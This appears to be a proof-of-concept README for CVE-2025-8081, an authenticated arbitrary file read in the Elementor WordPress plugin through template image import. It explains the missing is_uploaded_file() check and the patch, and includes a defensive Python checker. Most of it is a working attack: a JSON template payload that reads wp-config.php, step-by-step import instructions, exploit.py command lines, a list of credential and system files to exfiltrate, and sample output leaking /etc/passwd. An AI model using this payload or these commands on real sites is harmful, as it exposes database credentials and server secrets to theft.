CVE-2025-8081 PoC — Elementor <= 3.30.2 - Authenticated (Administrator+) Arbitrary File Read via Image Import

Associated Vulnerability
Title: Elementor <= 3.30.2 - Authenticated (Administrator+) Arbitrary File Read via Image Import (CVE-2025-8081)
Description: The Elementor plugin for WordPress is vulnerable to Arbitrary File Read in all versions up to, and including, 3.30.2 via the Import_Images::import() function due to insufficient controls on the filename specified. This makes it possible for authenticated attackers, with administrator-level access and above, to read the contents of arbitrary files on the server, which can contain sensitive information.

Description
PoC for CVE-2025-8081 - Elementor Arbitrary File Read Vulnerability

Readme
# CVE-2025-8081 - Elementor Arbitrary File Read Vulnerability

![Severity](https://img.shields.io/badge/Severity-CRITICAL-red)
![CVSS](https://img.shields.io/badge/CVSS-4.9-orange)
![WordPress](https://img.shields.io/badge/WordPress-Tested-blue)
![Elementor](https://img.shields.io/badge/Elementor-%E2%89%A43.30.2-red)

A critical arbitrary file read vulnerability in the Elementor WordPress plugin that allows authenticated administrators to read any file accessible by the web server, including sensitive configuration files containing database credentials.

---

## 📋 Vulnerability Overview

### CVE Information

| Property | Value |
|----------|-------|
| **CVE ID** | CVE-2025-8081 |
| **Type** | Arbitrary File Read (CWE-22: Path Traversal) |
| **CVSS Score** | 4.9 (Medium) - **Real Impact: CRITICAL** |
| **CVSS Vector** | AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N |
| **Affected Versions** | Elementor ≤ 3.30.2 |
| **Fixed Version** | Elementor ≥ 3.30.3 |
| **Release Date** | July 22, 2025 |
| **Disclosure Date** | October 15, 2025 |

### Attack Requirements

- ✅ WordPress Administrator account
- ✅ Elementor plugin installed and activated
- ✅ Access to template import functionality
- ✅ Image Elementor Widget enabled

### Impact

- 🔴 **Arbitrary File Read**: Read any file accessible by the web server user (www-data)
- 🔴 **Credential Theft**: Access to `wp-config.php` reveals database credentials and security keys
- 🔴 **Database Compromise**: Full access to WordPress database using stolen credentials

---

## 🎯 Vulnerability Details

### Location

The vulnerability exists in a **single file** at a **single line**:

```
elementor/includes/template-library/classes/class-import-images.php
Line 115 (v3.28.3)
```

### Vulnerable Code (v3.28.3)

```php
if ( isset( $attachment['tmp_name'] ) ) {
    // Used when called to import a directly-uploaded file.
    $filename = $attachment['name'];
    $file_content = Utils::file_get_contents( $attachment['tmp_name'] );  // ❌ NO VALIDATION!
}
```

**Problem**: The `tmp_name` parameter is **NOT validated** with `is_uploaded_file()`, allowing an attacker to specify **arbitrary file paths**.

### Patched Code (v3.30.3)

```php
if ( isset( $attachment['tmp_name'] ) ) {
    // Used when called to import a directly-uploaded file.
    $filename = $attachment['name'];
    $file_content = false;
    // security validation in case the tmp_name has been tampered with
    if ( is_uploaded_file( $attachment['tmp_name'] ) ) {  // ✅ VALIDATION ADDED!
        $file_content = Utils::file_get_contents( $attachment['tmp_name'] );
    }
}
```

**Fix**: The patch adds `is_uploaded_file()` validation to ensure `tmp_name` refers to a legitimate HTTP POST uploaded file.

---

## 💣 Proof of Concept

### JSON Payload

```json
{
  "content": [{
    "id": "s1",
    "elType": "section",
    "settings": [],
    "elements": [{
      "id": "c1",
      "elType": "column",
      "settings": {"_column_size": 100},
      "elements": [{
        "id": "w1",
        "elType": "widget",
        "widgetType": "image",
        "settings": {
          "image": {
            "url": "http://x.com/x.jpg",
            "id": 1,
            "tmp_name": "/var/www/html/wp-config.php",
            "name": "leaked_config.txt"
          }
        },
        "elements": []
      }]
    }]
  }],
  "version": "0.4",
  "type": "page"
}
```
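As an added defensive check (not part of this PoC or of Elementor's own code), the following Python script walks a template JSON in the format shown above and flags any attachment carrying a `tmp_name`, the field the vulnerable branch reads from disk. It assumes that a legitimate JSON export references images by `url`/`id` only and never includes `tmp_name`; the sample template is constructed inline from the payload shape above.

```python
# Constructed sample in the template format shown above: an image widget whose
# attachment carries a tmp_name pointing at a file that was never uploaded.
SAMPLE_TEMPLATE = {
    "content": [{
        "id": "s1", "elType": "section", "settings": [],
        "elements": [{
            "id": "c1", "elType": "column", "settings": {"_column_size": 100},
            "elements": [{
                "id": "w1", "elType": "widget", "widgetType": "image",
                "settings": {"image": {
                    "url": "http://x.com/x.jpg", "id": 1,
                    "tmp_name": "/var/www/html/wp-config.php",
                    "name": "leaked_config.txt"}},
                "elements": []}]}]}],
    "version": "0.4", "type": "page",
}


def iter_elements(elements, path="content"):
    """Depth-first walk over Elementor's nested element tree, yielding (path, element)."""
    for index, element in enumerate(elements or []):
        if not isinstance(element, dict):
            continue
        here = f"{path}[{index}]"
        yield here, element
        yield from iter_elements(element.get("elements"), here + ".elements")


def find_tampered_attachments(template):
    """Return one finding per settings value carrying a tmp_name key (assumption:
    legitimate exports reference images by url/id only, never by tmp_name)."""
    findings = []
    for path, element in iter_elements(template.get("content")):
        settings = element.get("settings")
        if not isinstance(settings, dict):  # sections may carry "settings": []
            continue
        for setting, value in settings.items():
            if isinstance(value, dict) and "tmp_name" in value:
                findings.append({
                    "path": f"{path}.settings.{setting}",
                    "element_id": element.get("id"),
                    "widget": element.get("widgetType"),
                    "tmp_name": value["tmp_name"],
                    "name": value.get("name"),
                })
    return findings


def is_safe_to_import(template):
    """True when no attachment in the template asks the server to read a local path."""
    return not find_tampered_attachments(template)
```

Run it against a template before it reaches the importer (or against templates already stored as media) and reject anything that returns a non-empty finding list.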

### Manual Exploitation Steps

1. Log in to WordPress as Administrator
2. Navigate to **Elementor** → **My Templates** → **Import Templates**
3. Upload the JSON payload above (save as `payload.json`)
4. Click **Import Now**
5. Go to **Media** → **Library**
6. Find and download `leaked_config.txt`

**Result**: `wp-config.php` content with database credentials exposed!

---

## 📊 Interesting Files to Exfiltrate

### Critical Files

| File | Description | Impact |
|------|-------------|--------|
| `/var/www/html/wp-config.php` | WordPress configuration | 🔴 **CRITICAL** - DB credentials |
| `/proc/self/environ` | Environment variables | 🔴 **CRITICAL** - API keys, secrets |

### High Value Files

| File | Description | Impact |
|------|-------------|--------|
| `/etc/passwd` | System users | 🟠 **HIGH** - User enumeration |
| `/var/www/html/.htaccess` | Web server config | 🟠 **HIGH** - Configuration disclosure |
| `/var/log/apache2/access.log` | Apache logs | 🟡 **MEDIUM** - Information disclosure |

---

## 🛠️ Automated Exploitation

### Quick Start

```bash
python3 exploit.py -t https://target.com -u admin -p password123
```

### Command-Line Options

```
Required Arguments:
  -t, --target URL        Target WordPress URL (e.g., https://target.com)
  -u, --user USERNAME     WordPress admin username
  -p, --password PASS     WordPress admin password

Optional Arguments:
  -f, --file PATH         File to read (default: /var/www/html/wp-config.php)
  -o, --output FILE       Output filename (default: auto-generated)
  --insecure, -k          Disable SSL certificate verification
  -v, --verbose           Enable verbose output for debugging
  -h, --help              Show help message
```

### Usage Examples

```bash
# Basic exploitation (reads wp-config.php with default payload)
python3 exploit.py -t http://target.com -u admin -p password123

# Custom target file
python3 exploit.py -t http://target.com -u admin -p password123 -f /etc/passwd

# With HTTPS and self-signed certificate
python3 exploit.py -t https://target.com -u admin -p password123 --insecure

# Verbose mode with custom output
python3 exploit.py -t http://target.com -u admin -p password123 \
  -f /etc/passwd -o users.txt -v

# From OrbStack/Docker targeting host machine
python3 exploit.py -t http://host.internal:8080 -u admin -p password123 -v
```

### Expected Output

```
Kali:~$ python3 exploit.py  -t http://host.internal:8080 -u admin -p admin123 -f /etc/passwd

======================================================================
 CVE-2025-8081 - Elementor Arbitrary File Read
======================================================================
Target: http://host.internal:8080
File:   /etc/passwd
======================================================================

[INFO] Attempting WordPress authentication...
[SUCCESS] ✓ Authentication successful!
[INFO] Fetching AJAX nonce...
[INFO] Loading payload: payload.json
[INFO] Uploading malicious template...
[SUCCESS] ✓ Template uploaded successfully!
[INFO] Searching for leaked file: leaked_passwd.txt
[SUCCESS] ✓ Found file: http://host.internal:8080/wp-content/uploads/2025/10/leaked_passwd.txt
[INFO] Downloading file...
[SUCCESS] ✓ Downloaded 839 bytes

======================================================================
 EXPLOITATION SUCCESSFUL!
======================================================================
File URL:  http://host.internal:8080/wp-content/uploads/2025/10/leaked_passwd.txt
File size: 839 bytes
Saved to:  leaked_passwd.txt

--- FILE CONTENT (first 500 chars) ---
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin
--- END ---
======================================================================
```

---

## ⚖️ Legal Disclaimer

**FOR EDUCATIONAL AND AUTHORIZED TESTING ONLY**

This tool is provided for security research and penetration testing purposes only. Usage of this tool for attacking targets without prior mutual consent is **illegal**.

**It is the end user's responsibility to obey all applicable local, state, and federal laws.**

- ✅ Use only on systems you own or have explicit written permission to test
- ✅ Responsible disclosure practices
- ✅ Educational and research purposes
- ❌ Unauthorized access is illegal and punishable by law
- ❌ The author assumes no liability for misuse

**By using this tool, you agree to use it legally and ethically.**

---

Last Updated: October 17, 2025